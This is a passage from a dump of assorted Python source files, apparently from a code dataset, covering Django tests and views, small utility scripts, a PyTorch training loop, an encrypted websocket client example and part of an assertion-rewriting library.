self.workers[1].id)\n\n # Machine task was created\n # (Test form init with a machine task)\n self.assertEquals(Task.objects.filter(project=project).count(),\n 2)\n machine_task = (Task.objects.filter(project=project)\n .exclude(id=human_task.id).first())\n form = TaskForm(instance=machine_task)\n self.assertEquals(form.fields['currently_assigned_to'].initial,\n None)\n\n def test_task_form_save(self):\n \"\"\"\n Test task form save for new, human and machine tasks\n \"\"\"\n workflow_version = self.workflow_versions['test_workflow']\n human_step = self.workflow_steps[workflow_version.slug]['step1']\n project = ProjectFactory(workflow_version=workflow_version)\n\n # Add new task to project\n form = TaskForm({'project': project.id,\n 'status': Task.Status.AWAITING_PROCESSING,\n 'step': human_step.id,\n 'start_datetime': timezone.now()})\n form.is_valid()\n self.assertTrue(form.is_valid())\n task = form.save()\n self.assertFalse(task.assignments.exists())\n\n # Add new task to project and assign to entry_level worker (0)\n form = TaskForm({'project': project.id,\n 'status': Task.Status.AWAITING_PROCESSING,\n 'step': human_step.id,\n 'start_datetime': timezone.now()})\n self.assertTrue(form.is_valid())\n form.cleaned_data['currently_assigned_to'] = self.workers[0].id\n task = form.save()\n self.assertTrue(is_worker_assigned_to_task(self.workers[0],\n task))\n self.assertEquals(assignment_history(task).count(), 1)\n self.assertTrue(task.assignments.exists())\n self.assertEquals(task.status, Task.Status.PROCESSING)\n\n # Render task with preexisting entry_level assignment (0) and reassign\n # to another entry_level worker (4)\n form = TaskForm(model_to_dict(task), instance=task)\n self.assertEquals(form.fields['currently_assigned_to'].initial,\n self.workers[0].id)\n form.is_valid()\n self.assertTrue(form.is_valid())\n form.cleaned_data['currently_assigned_to'] = self.workers[4].id\n task = form.save()\n self.assertTrue(is_worker_assigned_to_task(self.workers[4],\n task))\n self.assertEquals(assignment_history(task).count(), 1)\n self.assertEquals(task.status, Task.Status.PROCESSING)\n\n # Submit task\n with patch('orchestra.utils.task_lifecycle._is_review_needed',\n return_value=True):\n task = submit_task(task.id, {},\n 
TaskAssignment.SnapshotType.SUBMIT,\n self.workers[4], 0)\n\n # Assign to reviewer (1) and reassign to another reviewer (3)\n task = assign_task(self.workers[1].id, task.id)\n self.assertTrue(task.status, Task.Status.REVIEWING)\n self.assertTrue(is_worker_assigned_to_task(self.workers[1],\n task))\n task = Task.objects.get(id=task.id)\n form = TaskForm(model_to_dict(task), instance=task)\n self.assertEquals(form.fields['currently_assigned_to'].initial,\n self.workers[1].id)\n self.assertTrue(form.is_valid())\n form.cleaned_data['currently_assigned_to'] = self.workers[3].id\n task = form.save()\n self.assertTrue(is_worker_assigned_to_task(self.workers[3],\n task))\n self.assertEquals(assignment_history(task).count(), 2)\n self.assertEquals(task.status, Task.Status.REVIEWING)\n\n # Attempt to reassign to non-certified worker (2)\n form = TaskForm(model_to_dict(task), instance=task)\n self.assertTrue(form.is_valid())\n form.cleaned_data['currently_assigned_to'] = self.workers[2].id\n with self.assertRaises(WorkerCertificationError):\n form.save()\n","sub_path":"orchestra/tests/test_admin.py","file_name":"test_admin.py","file_ext":"py","file_size_in_byte":7391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"45054728","text":"import csv\nimport random\n\nq = 0 \nace = 0\nquestionsList = []\nanswersList = []\nscore = []\n\nprint(\"Math test\")\nname = input(\"Please, introduce your name: \")\nprint(\"Good luck!\\n\")\n\nwhile q != 5:\n num1 = random.randint(1, 99)\n num2 = random.randint(1, 99)\n\n ans = int(input(str(num1) + \"+\" + str(num2) + \"=\")) \n q += 1\n if ans == num1 + num2:\n \tace += 1\n questionsList.append(str(num1) + \"+\" + str(num2))\n answersList.append(ans)\n\n\nprint(\"\\nEnd of the test, you scored \" + str(ace) + \"/5.\")\n\nscore = str(ace) + \"/5\"\nquestions = \", \".join([str(elem) for elem in questionsList])\nanswers = \", \".join([str(elem) for elem in answersList])\n\ntest = []\ntest.append(name)\ntest.append(questions)\ntest.append(answers)\ntest.append(score)\n\nprint(test)\n\n\nwith open(\"MathTests.csv\", \"a\") as file:\n\twriter = csv.writer(file, delimiter='\\t')\n\twriter.writerow(str(elem) for elem in test)","sub_path":"14_Reading_and_Writing_to_a_csv_File/Problema_117.py","file_name":"Problema_117.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"53245769","text":"from warnings import warn\nfrom django.conf import settings\n\n#: A list of one or more sitemaps to inform robots about:\nSITEMAP_URLS = []\nSITEMAP_URLS.extend(getattr(settings, 'ROBOTS_SITEMAP_URLS', []))\n\n#: A list of one or more sitemap views used to render sitemaps in the current project:\n#: The defaults are the ones that come from django, but if the users override them\n#: we just extend the list. If the urls have no reverse lookup, we won't embed them in the robots\nSITEMAP_VIEWS = ['django.contrib.sitemaps.views.index', 'django.contrib.sitemaps.views.sitemap']\nSITEMAP_VIEWS.extend(getattr(settings, 'ROBOTS_SITEMAP_VIEWS', []))\n\n# For backwards-compatibility, we'll automatically add a single URL\n# to the list:\nSITEMAP_URL = getattr(settings, 'ROBOTS_SITEMAP_URL', None)\nif SITEMAP_URL is not None:\n warn(\"The ``SITEMAP_URL`` setting is deprecated. 
\"\n \"Use ``SITEMAP_URLS`` instead.\", PendingDeprecationWarning)\n SITEMAP_URLS.append(SITEMAP_URL)\n\nUSE_SITEMAP = getattr(settings, 'ROBOTS_USE_SITEMAP', True)\nEXCLUDE_URL_NAMES = getattr(settings, 'ROBOTS_EXCLUDE_URL_NAMES', [])\nCACHE_TIMEOUT = getattr(settings, 'ROBOTS_CACHE_TIMEOUT', None)\n\nADMIN = '/admin/'\n","sub_path":"robots/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"466361733","text":"\"\"\"\nShow some text as a corner annotation.\nFonts: arial, courier, times.\n\"\"\"\nfrom vtkplotter import show, Text, Cube\n\nwith open(\"annotations.py\") as fname:\n t = fname.read()\n\nactor2d = Text(t, pos=3, s=1.2, c='k', bg=\"lb\", font=\"courier\")\n\nshow(actor2d, Cube(), verbose=0, axes=0)\n","sub_path":"examples/plotting2d/annotations.py","file_name":"annotations.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"76519287","text":"# Utility to calculate Rakuten Trade fees\nfrom math import ceil\n\nprint('Please input total share number to purchase ')\nshare_no = int(input())\n\nprint('Please input purchse price')\nmarket_price = float(input())\n\nprint('Stamp Duty exemption? y / n')\nmarket_exempt = True if input() == 'y' else False\n\ntotal_price = share_no * market_price\n\n# Calculate broker_fee\nif total_price < 1000:\n\tbroker_fee = 7\nelif total_price >= 1000 and total_price <= 9999.99:\n\tbroker_fee = 8\nelif total_price >= 10000 and total_price <= 99999.99:\n\tbroker_fee = total_price * 0.001\nelse:\n\tbroker_fee = 100\n\n# Calulate clearing fee\nclearing_fee = float(min(total_price * 0.0003, 1000))\n\n# Calculate stamp duty\nif market_exempt is True:\n\tstamp_duty = 0\nelse:\n\tstamp_duty = ceil(total_price / 1000)\n\tstamp_duty = min(200, stamp_duty)\n\n# Calculate sst\nsst = broker_fee * 0.06\n\ntotal_cost = clearing_fee + stamp_duty + broker_fee + sst\ntotal_fee = total_price + clearing_fee + stamp_duty + broker_fee + sst\n\nprint('The total broker fee is %.2f' % broker_fee)\nprint('The total clearing fee is %.2f' % clearing_fee)\nprint('The total stamp duty is %.2f' % stamp_duty)\nprint('The total SST is %.2f' % sst)\nprint('The total transaction cost is %.2f' % total_cost)\nprint('The total fee is : %.2f' % total_fee)\n","sub_path":"rakuten.py","file_name":"rakuten.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"168681175","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\n\"\"\"\nmail:wqc2008@gmail.com\n@createtime: 17/10/30 下午4:44\n@license: Apache Licence 2.0\nusege:\n ......\n\n\"\"\"\n\nimport time\nimport pymongo\nimport requests\nfrom pymongo import ReturnDocument\n\nfrom settings import MONGO_DATABASE,MONGO_URI,CURRENT_SITE_NAME,BOT_NAME\n\nclient = pymongo.MongoClient(MONGO_URI)\ndb = client[MONGO_DATABASE]\nurl = \"http://localhost:6800/schedule.json\"\n\ni = 0\nwhile True:\n\n where = {\"status\": 0}\n updata = {'$set': {'status': 1}}\n sort = [('inc_num', pymongo.ASCENDING)]\n\n result = db[\"articles\"].find_one_and_update(where, updata, sort=sort, return_document=ReturnDocument.AFTER)\n\n if result != None:\n\n data = {\"project\": BOT_NAME, \"spider\": 'ddetails', \"site_name\": CURRENT_SITE_NAME, \"article_name\": result['title'],\n \"article_url\": result['url']}\n r = requests.post(url, data)\n 
print(r.text)\n\n else:\n\n print(\"No more records with status 0 in the pages collection\")\n break\n\n i = i + 1\n\n if i % 10 == 0:\n time.sleep(3)\n\n","sub_path":"ebook/rebot_ddetails.py","file_name":"rebot_ddetails.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"289212555","text":"# -*- coding: utf-8 -*-\n# @Time : Thu Mar 7 13:49:02 2019\n# @Author : Yao Qiang\n# @Email : qiangyao1988wsu@gmail.com\n# @File : Train.py\n# @Software: Spyder\n# @Python Version: python3.6\n\n\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport CreateModel \nimport TrainSet \n\ndef train(epoch):\n '''\n train model\n '''\n \n # The net is in training mode, so we can use dropout\n net.train() \n correct = 0\n sum = 0\n T = 0\n \n \n running_loss = 0.0\n\n for batch_index, (datas, labels) in enumerate(trainloader, 0):\n labels = labels.max(1)[1]\n datas = Variable(datas).float()\n datas = datas.view(-1, 1, 256, 256)\n labels = Variable(labels).long()\n \n if torch.cuda.is_available():\n datas = datas.cuda()\n labels = labels.cuda()\n \n # forward\n optimizer.zero_grad()\n outputs = net(datas)\n loss = criterion(outputs, labels)\n \n # back\n loss.backward()\n optimizer.step()\n \n \n # print statistics\n running_loss += loss.item()\n \n T += 1\n pred_choice = outputs.data.max(1)[1]\n correct += pred_choice.eq(labels.data).cpu().sum()\n sum += len(labels)\n # accuracy = correct / sum\n \n if batch_index % 100 == 99:\n print('[%d,%4d] loss: %.3f' %\n (epoch + 1, batch_index + 1, running_loss))\n running_loss = 0.0\n print('Accuracy of the network: %d %%' % (100 * correct / sum))\n \n ''' \n print('batch_index: [%d/%d]' % (batch_index, len(trainloader)),\n 'Train epoch: [%d]' % (epoch),\n 'correct/sum:[%d/%d]' % (correct, sum),\n 'accuracy:[%d]' % (accuracy))\n '''\n\n\n\n\ndef eval(epoch):\n '''\n eval mode\n '''\n # The net is in eval mode, so we do not use dropout, and backpropagation is stopped\n net.eval() \n correct = 0\n sum = 0\n \n for batch_index, (datas, labels) in enumerate(evalloader, 0):\n labels = labels.max(1)[1]\n datas = Variable(datas).cuda().float()\n datas = datas.view(-1, 1, 256, 256)\n labels = Variable(labels).cuda().long()\n # optimizer.zero_grad()\n outputs = net(datas)\n # loss = criterion(outputs, labels)\n # loss.backward()\n # optimizer.step()\n\n pred_choice = outputs.data.max(1)[1]\n correct += pred_choice.eq(labels.data).cpu().sum()\n sum += len(labels)\n \n # accuracy = correct / sum\n ''' \n print('batch_index: [%d/%d]' % (batch_index, len(evalloader)),\n 'Eval epoch: [%d]' % (epoch),\n 'correct/sum:%d/%d' % (correct, sum),\n 'accuracy:[%d]' % (accuracy))\n ''' \n\nif __name__ == '__main__':\n \n n_epoch, batch_size = 1, 8\n \n # create trainloader and evalloader\n trainset = TrainSet.TrainSet(eval=False)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True)\n evalset = TrainSet.TrainSet(eval=True)\n evalloader = torch.utils.data.DataLoader(evalset, batch_size=batch_size, shuffle=True)\n \n net = CreateModel.net()\n \n if torch.cuda.is_available():\n net.cuda()\n \n # loss function \n criterion = nn.CrossEntropyLoss()\n\n #optimizer\n optimizer = optim.SGD(net.parameters(), lr=1e-3, momentum=0.9, weight_decay=1e-4)\n\n \n \n # Whether to load model parameters\n load = False\n\n if load:\n checkpoint = CreateModel.load_checkpoint()\n net.load_state_dict(checkpoint['state_dict'])\n start_epoch = checkpoint['epoch'] 
+ 1\n else:\n start_epoch = 0\n\n\n for epoch in range(start_epoch, n_epoch):\n train(epoch)\n\n # save checkpoint\n checkpoint = {'epoch': epoch, 'state_dict': net.state_dict(), 'optimizer': optimizer.state_dict()}\n CreateModel.save_checkpoint(checkpoint)\n\n eval(epoch)","sub_path":"scripts/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"118679900","text":"from settings import *\nimport random\n\nlanguage_wakeWords = ['computer']\nlanguage_politeWords = ['please', 'thanks', 'sorry', 'thank', 'por', 'favor']\nlanguage_rudeWords = ['fuck', 'shit', 'bitch']\n\ninsults = ['stupid human', 'idiot', 'meat bag']\n\ndef isRude(words):\n score = 0\n for word in words:\n if word in language_rudeWords:\n score += 1\n\n if (score >= rudeThreshold):\n return True\n return False\n\ndef randomInsult():\n return random.choice(insults)","sub_path":"logic/language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"276831753","text":"from django.shortcuts import render, redirect # added\nfrom django.contrib.auth import authenticate, login # added\nfrom .forms import CustomUserCreationForm # added\nfrom django.shortcuts import get_object_or_404, render, redirect \nfrom .models import Product\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.http import require_POST\nfrom django.contrib import messages # added\nfrom .forms import AddToCartForm # added\n\n\n\n\ndef index(request):\n products = Product.objects.all().order_by('-id')\n return render(request, 'app/index.html', {'products': products})\n\n\ndef signup(request):\n if request.method == 'POST':\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n new_user = form.save()\n input_email = form.cleaned_data['email']\n input_password = form.cleaned_data['password1']\n new_user = authenticate(email=input_email,password=input_password)\n if new_user is not None:\n login(request, new_user)\n return redirect('app:index')\n else:\n form = CustomUserCreationForm()\n return render(request, 'app/signup.html', {'form': form})\n\ndef detail(request, product_id):\n product = get_object_or_404(Product, pk=product_id)\n add_to_cart_form = AddToCartForm(request.POST or None)\n if add_to_cart_form.is_valid():\n num = add_to_cart_form.cleaned_data['num']\n\n # Branch on whether the session already has a 'cart' key\n if 'cart' in request.session:\n # If this product already has a quantity, add the new quantity to it; otherwise add a new key\n if str(product_id) in request.session['cart']:\n request.session['cart'][str(product_id)] += num\n else:\n request.session['cart'][str(product_id)] = num\n else:\n # Add a new 'cart' key to the session\n request.session['cart'] = {str(product_id): num}\n messages.success(request, f\"Added {num} of {product.name} to your cart!\")\n return redirect('app:detail', product_id=product_id)\n context = {\n 'product': product,\n 'add_to_cart_form': add_to_cart_form,\n }\n\n return render(request, 'app/detail.html', context)\n\n@login_required\n@require_POST\ndef toggle_fav_product_status(request):\n product = get_object_or_404(Product, pk=request.POST[\"product_id\"])\n user = request.user\n if product in user.fav_products.all():\n user.fav_products.remove(product)\n else:\n user.fav_products.add(product)\n return redirect('app:detail', product_id=product.id)\n\n@login_required\ndef fav_products(request):\n user = request.user\n products = 
user.fav_products.all()\n return render(request, 'app/index.html', {'products': products})\n\n\n@login_required \ndef cart(request):\n cart = request.session.get('cart', {})\n cart_products = dict()\n total_price = 0\n for product_id, num in cart.items():\n product = Product.objects.get(id=product_id)\n cart_products[product] = num\n total_price += product.price * num\n context = {\n 'cart_products': cart_products,\n 'total_price': total_price,\n }\n return render(request, 'app/cart.html', context)\n\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"621946825","text":"# !/usr/bin/env python\n\n# WS client example\n\nimport asyncio\nimport base64\nimport json\nimport time\n\nimport websockets\nimport binascii\n\nfrom Crypto.Cipher import AES\nfrom Crypto.Util import Counter\nfrom Crypto import Random\n\nkey_bytes = 16\napi_key = base64.b64decode(\"3cYdoIdwr3b49eyuH92oPw==\")\n\n\ndef encrypt(key, plaintext):\n assert len(key) == key_bytes\n\n # Choose a random, 16-byte IV.\n iv = Random.new().read(AES.block_size)\n\n # Convert the IV to a Python integer.\n iv_int = int(binascii.hexlify(iv), 16)\n\n # Create a new Counter object with IV = iv_int.\n ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)\n\n # Create AES-CTR cipher.\n aes = AES.new(key, AES.MODE_CTR, counter=ctr)\n\n # Encrypt and return IV and ciphertext.\n ciphertext = aes.encrypt(plaintext)\n return iv + ciphertext\n\n\ndef decrypt(key, ciphertext):\n assert len(key) == key_bytes\n\n # Convert the IV to a Python integer.\n iv_int = int(binascii.hexlify(ciphertext[:16]), 16)\n\n # Create a new Counter object with IV = iv_int.\n ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)\n\n # Create AES-CTR cipher.\n aes = AES.new(key, AES.MODE_CTR, counter=ctr)\n\n # Decrypt and return the plaintext.\n plaintext = aes.decrypt(ciphertext[16:])\n return plaintext\n\n\nasync def hello():\n websocket = await websockets.connect('ws://localhost:3145', ping_timeout=None)\n\n req = {\n \"type\": \"balance_info\",\n \"account_id\": '1',\n \"id\": 1,\n }\n await websocket.send(str(base64.standard_b64encode(encrypt(api_key, json.dumps(req))), \"utf-8\"))\n print('send request origin ', req)\n print('send request encrypt ', str(base64.standard_b64encode(encrypt(api_key, json.dumps(req))), \"utf-8\"))\n\n while True:\n response = await websocket.recv()\n print(\"receive response encrypt \", response)\n response = decrypt(api_key, base64.b64decode(response))\n response = json.loads(response)\n\n # if resp['type'] == 'balance_changed' or resp['type'] == 'balance_info':\n # print(f\"balance_changed {response}\")\n\n # if resp['type'] == 'sync_changed' and resp['is_synchronized']:\n # print(f\"sync_changed or is_synchronized {response}\")\n\n print(\"receive response origin \", response)\n time.sleep(5)\nasyncio.get_event_loop().run_until_complete(hello())\n\n\n\n\n\n\n\n\n# send request origin {'type': 'balance_info', 'account_id': '1', 'id': 1}\n# send request encrypt QwVxuiPXH5YTUSRv1aJ+Y2ZpjwT1Q+QXcyP0q2oKrtEGrsabzcJPa+LXrLfKTHwzMV/0CNWC+Ho4yT6ec5D5STkp19s=\n# receive response encrypt kdufVAXA0YH/rRt/eJ17znoBHaU9ahx7vq4CtbY5X0+zlqZgQ08032ACQ0Si3B8q9F1o9DMznxGu4AV8XJqPWlK57jlk7xvIbDmnlav+kqCLHLfk8DLpk07BPBh8aEIQU5XiCOrfRYzPQjWPsRUdyLmd7A==\n# receive response origin {'account_id': '1', 'type': 'balance_info', 'balance': 1782764007, 'available_balance': 1782764007, 'id': 1}\n# receive 
response encrypt Sr7ulOn//xciIdQuRf5nqpgu7x79CCFVU2JLYzaDcFMRgE1FW3Mun3oJEHCO+32X/HU0tM9IiYNkDk5em/CSZYVG87dnSXzbwyWp6NODXVag3o+/GaWP\n# receive response origin {'type': 'rollback_micro_block', 'epoch': 14020, 'offset': 59, 'statuses': {}}","sub_path":"websocket_example.py","file_name":"websocket_example.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"9774113","text":"\"\"\"CallHubTest URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.contrib.auth import views as auth_views\n\nfrom ticketApp import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n path('', views.home, name='home'),\n path('login/', auth_views.LoginView.as_view(), name='login'),\n path('register/', views.register, name='register'),\n path('create/', views.create, name='create'),\n path('open/', views.open_tickets, name='open'),\n path('closed/', views.closed_tickets, name='closed'),\n path('open/edit/<int:pk>/', views.edit_tickets, name='edit'),\n path('open/edit/<int:pk>/close_this_ticket', views.close_the_ticket, name='close_ticket')\n]\n","sub_path":"CallHubTest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"153872425","text":"import os\nimport pandas as pd\n\nfrom celescope.__init__ import __VERSION__, ASSAY_DICT\nimport celescope.tools.utils as utils\nfrom celescope.tools.__init__ import __PATTERN_DICT__\nfrom celescope.tools.barcode import Chemistry\nfrom celescope.tools.step import Step, s_common\n\n\n@utils.add_log\ndef sample(args):\n \n step_name = \"sample\"\n step = Step(args, step_name)\n\n sample_name = args.sample\n assay = args.assay\n assay_description = ASSAY_DICT[assay]\n version = __VERSION__\n outdir = args.outdir\n chemistry = args.chemistry\n\n # get chemistry\n if chemistry == 'auto':\n fq1 = args.fq1\n ch = Chemistry(fq1)\n chemistry = ch.check_chemistry()\n chemistry = \",\".join(set(chemistry))\n else:\n chemistry = args.chemistry\n \n\n if not os.path.exists(outdir):\n os.system('mkdir -p %s' % outdir)\n\n stat = pd.DataFrame({\n \"item\": [\"Sample ID\", \"Assay\", \"Chemistry\", \"Software Version\"],\n \"count\": [sample_name, assay_description, chemistry, version],\n },\n columns=[\"item\", \"count\"]\n )\n stat_file = outdir + \"/stat.txt\"\n stat.to_csv(stat_file, sep=\":\", header=None, index=False)\n\n step.clean_up()\n\n return chemistry\n\n\ndef get_opts_sample(parser, sub_program):\n if sub_program:\n parser = s_common(parser)\n parser.add_argument('--fq1', help='read1 fq file')\n parser.add_argument('--chemistry', choices=list(__PATTERN_DICT__.keys()), help='chemistry version', default='auto')\n return parser\n 
\n","sub_path":"celescope/tools/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"170705431","text":"# Copyright 2019 Katteli Inc.\n# TestFlows.com Open-Source Software Testing Framework (http://testflows.com)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport ast\nimport copy\nimport inspect\nimport pprint\nimport difflib\nimport textwrap\nimport linecache\nimport itertools\nimport builtins\n\n__all__ = [\"error\", \"errors\", \"values\"]\n\n\nclass values(object):\n \"\"\"Obtains value so that expression\n does not need to be reinterpreted if\n assertion fails.\n \"\"\"\n\n __slots__ = (\"stack\",)\n\n def __init__(self):\n self.stack = []\n\n def __enter__(self):\n return self\n\n def __call__(self, x):\n self.stack.append(x)\n return x\n\n def __exit__(self, *args):\n pass\n\n\nclass AssertEval(ast.NodeVisitor):\n \"\"\"Asssertion expression evaluator.\n\n :param frame: frame where the assertion occured\n \"\"\"\n\n # Known types\n _simple = (\n ast.Num,\n ast.Str,\n ast.NameConstant,\n ast.Attribute,\n ast.Call,\n ast.BinOp,\n ast.UnaryOp,\n ast.IfExp,\n ast.BoolOp,\n ast.List,\n ast.Tuple,\n ast.Set,\n ast.Dict,\n ast.Starred,\n ast.Compare,\n )\n\n # operator symbols\n _op_symbols = {\n # boolean ops\n ast.And: \"and\",\n ast.Or: \"or\",\n # binary ops\n ast.Add: \"+\",\n ast.Sub: \"-\",\n ast.Mult: \"*\",\n ast.Div: \"/\",\n ast.Mod: \"%\",\n ast.Pow: \"**\",\n ast.LShift: \"<<\",\n ast.RShift: \">>\",\n ast.BitOr: \"|\",\n ast.BitXor: \"^\",\n ast.BitAnd: \"&\",\n ast.FloorDiv: \"//\",\n # compare ops\n ast.Eq: \"==\",\n ast.NotEq: \"!=\",\n ast.Lt: \"<\",\n ast.LtE: \"<=\",\n ast.Gt: \">\",\n ast.GtE: \">=\",\n ast.Is: \"is\",\n ast.IsNot: \"is not\",\n ast.In: \"in\",\n ast.NotIn: \"not in\",\n # unary ops\n ast.Invert: \"~\",\n ast.Not: \"not\",\n ast.UAdd: \"+\",\n ast.USub: \"-\",\n }\n\n # boolean operators\n _boolean_ops = {\n ast.And: lambda left, right: left and right,\n ast.Or: lambda left, right: left or right,\n }\n\n # binary operators\n _binary_ops = {\n ast.Add: lambda left, right: left + right,\n ast.Sub: lambda left, right: left - right,\n ast.Mult: lambda left, right: left * right,\n ast.Div: lambda left, right: left / right,\n ast.Mod: lambda left, right: left % right,\n ast.Pow: lambda left, right: left**right,\n ast.LShift: lambda left, right: left << right,\n ast.RShift: lambda left, right: left >> right,\n ast.BitOr: lambda left, right: left | right,\n ast.BitXor: lambda left, right: left ^ right,\n ast.BitAnd: lambda left, right: left & right,\n ast.FloorDiv: lambda left, right: left // right,\n }\n\n # unary operators\n _unary_ops = {\n ast.Invert: lambda operand: ~operand,\n ast.Not: lambda operand: not operand,\n ast.UAdd: lambda operand: +operand,\n ast.USub: lambda operand: -operand,\n }\n\n # comparison operators\n _compare_ops = {\n ast.Eq: lambda left, right: left == right,\n ast.NotEq: lambda left, right: left != 
right,\n ast.Lt: lambda left, right: left < right,\n ast.LtE: lambda left, right: left <= right,\n ast.Gt: lambda left, right: left > right,\n ast.GtE: lambda left, right: left >= right,\n ast.Is: lambda left, right: left is right,\n ast.IsNot: lambda left, right: left is not right,\n ast.In: lambda left, right: left in right,\n ast.NotIn: lambda left, right: left not in right,\n }\n\n class FuncResult(object):\n \"\"\"Result wrapper.\"\"\"\n\n def __init__(self, result):\n self.result = result\n\n def __repr__(self):\n return \"= \" + _saferepr(self.result)\n\n class DiffResult(object):\n \"\"\"Compare diffable result wrapper.\"\"\"\n\n def __init__(self, result, diff):\n self.result = result\n self.diff = diff\n\n def __repr__(self):\n return _saferepr(self.result) + \"\\n\" + self.diff\n\n def __init__(self, frame, frame_info):\n def error(desc=None):\n pass\n\n self.frame = frame\n self.frame_info = frame_info\n self.f_globals = self.frame.f_globals\n self.f_locals = dict(self.frame.f_locals)\n self.f_locals[\"error\"] = error\n self.nodes = []\n self.expression = None\n self._is_assert = False\n\n def eval(self):\n \"\"\"Evaluate assert expression.\"\"\"\n expression_ast = None\n if self.expression:\n expression_ast = ast.parse(self.expression)\n else:\n code = (\n self.frame_info.code_context[0].strip()\n if self.frame_info.code_context\n else None\n )\n if code is not None:\n expression = \"\"\n expression_ast = None\n sourcelines, startline = inspect.getsourcelines(self.frame)\n startline = max(1, startline)\n for i in range(self.frame_info.lineno - startline + 1, 0, -1):\n expression = sourcelines[i - 1] + expression\n try:\n self.expression = textwrap.dedent(expression).strip()\n expression_ast = ast.parse(self.expression)\n break\n except SyntaxError as e:\n pass\n self.expression = self.expression.split(\"\\n\")\n if expression_ast:\n self.visit(expression_ast)\n return self.expression, self.nodes\n\n def _diff(self, op, result, left, right):\n \"\"\"Return result that includes diff\n for a few left and right types.\n\n :param op: operator\n :param result: result of the comparison\n :param left: left side comparison value\n :param right: right side comparison value\n \"\"\"\n if (not op is ast.Eq) or result:\n return result\n\n diff_types = (str, list, tuple, dict, set)\n if (\n isinstance(left, diff_types)\n and isinstance(right, diff_types)\n and isinstance(right, type(left))\n ):\n if isinstance(left, str):\n left_repr = left.splitlines()\n right_repr = right.splitlines()\n else:\n left_repr = pprint.pformat(left).splitlines()\n right_repr = pprint.pformat(right).splitlines()\n diff = \"\\n\".join(\n itertools.islice(\n difflib.unified_diff(left_repr, right_repr, n=0, lineterm=\"\"),\n 2,\n None,\n )\n )\n return self.DiffResult(result, diff)\n\n return result\n\n def _find_operator(self, op_type, lineno, col_offset):\n \"\"\"Find an operator offset which is right before\n the specified line number and column offset.\n\n :param lineno: line number\n :param col_offset: column offset\n \"\"\"\n expression = self.expression[:lineno]\n expression[-1] = expression[-1][: col_offset + 1].rstrip(\"({[\")\n op_sym = self._op_symbols.get(op_type, None)\n if op_sym is None:\n raise RuntimeError(\"unknown operator type '%s'\" % op_type)\n for lineno, line in reversed(list(enumerate(expression, 1))):\n idx = line.rfind(op_sym)\n if idx >= 0:\n break\n # if we did not find the operator returns (1, -1)\n return lineno, idx\n\n def visit_Module(self, node):\n return 
self.visit(node.body[0])\n\n def visit_Expr(self, node):\n if not self._is_assert:\n raise RuntimeError(\"not called from the assert statement\")\n return self.visit(node.value)\n\n def visit_Assert(self, node):\n self._is_assert = True\n result = bool(self.visit(node.test))\n self.nodes.append((result, node))\n return result\n\n def visit_Compare(self, node):\n left = self.visit(node.left)\n result = left\n if not isinstance(node.left, self._simple):\n self.nodes.append((result, node.left))\n for idx, operator, comparator in zip(\n range(len(node.ops)), node.ops, node.comparators\n ):\n op = type(operator)\n func = self._compare_ops[op]\n right = self.visit(comparator)\n op_result = func(left, right)\n if idx > 0:\n result = result and op_result\n else:\n result = op_result\n if not isinstance(comparator, self._simple):\n self.nodes.append((right, comparator))\n _operator = copy.copy(operator)\n _operator.lineno, _operator.col_offset = self._find_operator(\n op, comparator.lineno, comparator.col_offset\n )\n self.nodes.append(\n (self.FuncResult(self._diff(op, op_result, 